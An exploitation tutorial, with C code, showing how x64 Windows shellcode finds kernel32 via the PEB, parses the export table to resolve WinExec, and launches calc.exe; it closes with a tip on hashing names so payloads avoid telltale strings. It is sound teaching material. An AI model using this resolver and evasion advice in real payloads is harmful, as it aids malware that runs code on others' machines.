
#Article #Exploiting
[Shellcode x64] Find and execute WinAPI functions with Assembly
What you will learn:
– Locating WinAPI functions manually with assembly
– The PEB structure and PEB_LDR_DATA
– The PE file structure
– Relative Virtual Address (RVA) calculation
– The Export Address Table (EAT)
– The Windows x64 calling convention in practice
– Writing in Assembly like a real Giga-Chad…
In this article we manually find the address of the WinExec function exported by kernel32.dll and use it to launch calc.exe (the Windows built-in calculator). The point is to convey what position independence means in shellcode: the code cannot rely on an import table or on fixed addresses, so it has to locate kernel32 through the PEB and resolve WinExec from the export table at runtime, wherever it happens to be loaded.
The source of the project can be accessed from this link.
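The export-table walk the shellcode performs, as an added example in C that is not the article's own code (the article's implementation is in assembly, in the linked project). It runs offline against a constructed, minimal PE32+ image whose names, RVAs and "ForwardedStub" entry are made up for the check; on Windows the same `find_export()` is pointed at the real kernel32.dll base taken from the PEB with the hard-coded x64 offsets the shellcode technique relies on, and the resolved WinExec is called with `calc.exe`. The PEB offsets, the exe → ntdll → kernel32 list order and the PE field offsets are standard Windows x64 / PE/COFF values, not something taken from this page.

```c
#include <stdint.h>
#include <string.h>

/* PE32+ offsets from the PE/COFF spec. */
#define DOS_E_LFANEW   0x3C  /* IMAGE_DOS_HEADER.e_lfanew -> "PE\0\0" */
#define NT_EXPORT_RVA  0x88  /* OptionalHeader.DataDirectory[0].VirtualAddress */
#define NT_EXPORT_SIZE 0x8C  /* OptionalHeader.DataDirectory[0].Size */
#define EXP_NUM_NAMES  0x18  /* IMAGE_EXPORT_DIRECTORY.NumberOfNames */
#define EXP_FUNCS      0x1C  /* AddressOfFunctions: RVA of the function-RVA table */
#define EXP_NAMES      0x20  /* AddressOfNames: RVA of the name-string-RVA table */
#define EXP_ORDINALS   0x24  /* AddressOfNameOrdinals: RVA of the WORD index table */

static uint32_t rd32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static uint16_t rd16(const uint8_t *p) { uint16_t v; memcpy(&v, p, 2); return v; }
static void wr32(uint8_t *p, uint32_t v) { memcpy(p, &v, 4); }
static void wr16(uint8_t *p, uint16_t v) { memcpy(p, &v, 2); }

/* Resolve an export by name as the shellcode does: every export-directory field is an
 * RVA, rebased as base + RVA. Returns NULL if the name is absent or the export is a
 * forwarder (RVA inside the export directory, pointing at a "DLL.Func" string). */
const void *find_export(const uint8_t *base, const char *name)
{
    const uint8_t *nt = base + rd32(base + DOS_E_LFANEW);
    uint32_t exp_rva = rd32(nt + NT_EXPORT_RVA), exp_size = rd32(nt + NT_EXPORT_SIZE);
    if (exp_rva == 0) return NULL;                      /* module exports nothing */
    const uint8_t *exp = base + exp_rva;
    const uint8_t *funcs = base + rd32(exp + EXP_FUNCS);
    const uint8_t *names = base + rd32(exp + EXP_NAMES);
    const uint8_t *ords = base + rd32(exp + EXP_ORDINALS);
    for (uint32_t i = 0; i < rd32(exp + EXP_NUM_NAMES); i++) {
        if (strcmp((const char *)(base + rd32(names + 4 * i)), name) != 0) continue;
        uint16_t ord = rd16(ords + 2 * i);               /* name index -> function index */
        uint32_t fn_rva = rd32(funcs + 4 * ord);
        if (fn_rva >= exp_rva && fn_rva < exp_rva + exp_size) return NULL; /* forwarder */
        return base + fn_rva;
    }
    return NULL;
}

/* Constructed sample (not a real DLL): headers plus an export directory, laid out so
 * RVA == offset. Names are sorted as in a real EAT; the ordinal table is non-identity
 * so the lookup must honour the AddressOfNameOrdinals indirection. */
enum { RVA_NT = 0x80, RVA_EXP = 0x200, RVA_FUNCS = 0x240, RVA_NAMES = 0x260, RVA_ORDS = 0x280,
       RVA_STR = 0x2A0, RVA_FWD = 0x2E0, RVA_CODE = 0x400, IMG_SIZE = 0x800, N_EXPORTS = 4 };
static const struct { const char *name; uint16_t ord; uint32_t rva; } sample_exports[N_EXPORTS] = {
    { "CreateProcessA", 3, RVA_CODE + 0x30 },
    { "ForwardedStub",  2, RVA_FWD },                  /* inside the export dir: forwarder */
    { "WinExec",        1, RVA_CODE + 0x10 },
    { "lstrlenA",       0, RVA_CODE },
};
const uint8_t *build_sample_image(void)
{
    static uint8_t img[IMG_SIZE];                      /* zero-filled; rebuilding is idempotent */
    img[0] = 'M'; img[1] = 'Z'; wr32(img + DOS_E_LFANEW, RVA_NT);
    memcpy(img + RVA_NT, "PE\0\0", 4);
    wr16(img + RVA_NT + 0x18, 0x20B);                  /* PE32+ optional-header magic */
    wr32(img + RVA_NT + NT_EXPORT_RVA, RVA_EXP);
    wr32(img + RVA_NT + NT_EXPORT_SIZE, RVA_CODE - RVA_EXP);
    wr32(img + RVA_EXP + 0x14, N_EXPORTS); wr32(img + RVA_EXP + EXP_NUM_NAMES, N_EXPORTS);
    wr32(img + RVA_EXP + EXP_FUNCS, RVA_FUNCS);
    wr32(img + RVA_EXP + EXP_NAMES, RVA_NAMES);
    wr32(img + RVA_EXP + EXP_ORDINALS, RVA_ORDS);
    strcpy((char *)img + RVA_FWD, "NTDLL.SomeFunc");   /* what a forwarder RVA points at */
    for (uint32_t i = 0, s = RVA_STR; i < N_EXPORTS; i++) {
        wr16(img + RVA_ORDS + 2 * i, sample_exports[i].ord);
        wr32(img + RVA_FUNCS + 4 * sample_exports[i].ord, sample_exports[i].rva);
        wr32(img + RVA_NAMES + 4 * i, s);
        strcpy((char *)img + s, sample_exports[i].name);
        s += (uint32_t)strlen(sample_exports[i].name) + 1;
    }
    return img;
}
/* RVA of `name` in the sample image, or -1 when find_export() returns NULL. */
long sample_export_rva(const char *name)
{
    const uint8_t *img = build_sample_image(), *p = find_export(img, name);
    return p ? (long)(p - img) : -1;
}

#ifdef _WIN32
#include <windows.h>
/* The PEB walk the shellcode hard-codes on x64: gs:[0x60] = PEB, PEB+0x18 = Ldr, Ldr+0x20 =
 * InMemoryOrderModuleList, DllBase 0x20 past each entry's InMemoryOrderLinks; the list runs
 * exe -> ntdll.dll -> kernel32.dll, so the third entry is kernel32. */
static const uint8_t *kernel32_base(void)
{
    const uint8_t *peb = (const uint8_t *)__readgsqword(0x60);
    const uint8_t *e = *(const uint8_t *const *)(*(const uint8_t *const *)(peb + 0x18) + 0x20);
    e = *(const uint8_t *const *)e;                    /* 2nd entry: ntdll.dll */
    e = *(const uint8_t *const *)e;                    /* 3rd entry: kernel32.dll */
    return *(const uint8_t *const *)(e + 0x20);
}
#endif
int main(void)
{
#ifdef _WIN32
    typedef UINT (WINAPI *WinExec_t)(LPCSTR, UINT);
    WinExec_t fn = (WinExec_t)find_export(kernel32_base(), "WinExec");
    /* x64 convention: RCX = lpCmdLine, RDX = uCmdShow, 32 bytes of shadow space, RSP
     * 16-byte aligned at the call; the compiler emits this, shellcode does it by hand. */
    return fn && fn("calc.exe", SW_SHOW) > 31 ? 0 : 1;
#else
    return sample_export_rva("WinExec") == RVA_CODE + 0x10 ? 0 : 1;   /* offline self-check */
#endif
}
```

Two things worth carrying over into the assembly version: the forwarder check matters because several kernel32 exports forward to ntdll or KernelBase, and a blind `base + AddressOfFunctions[ordinal]` would jump into a string (WinExec itself is not forwarded); and the "third entry is kernel32" shortcut is a convention of the loader rather than a contract, so robust shellcode compares the entry's BaseDllName instead of counting. Real shellcode also usually compares a hash of each name rather than a `strcmp` against an embedded string, which keeps the payload small and free of telltale plaintext.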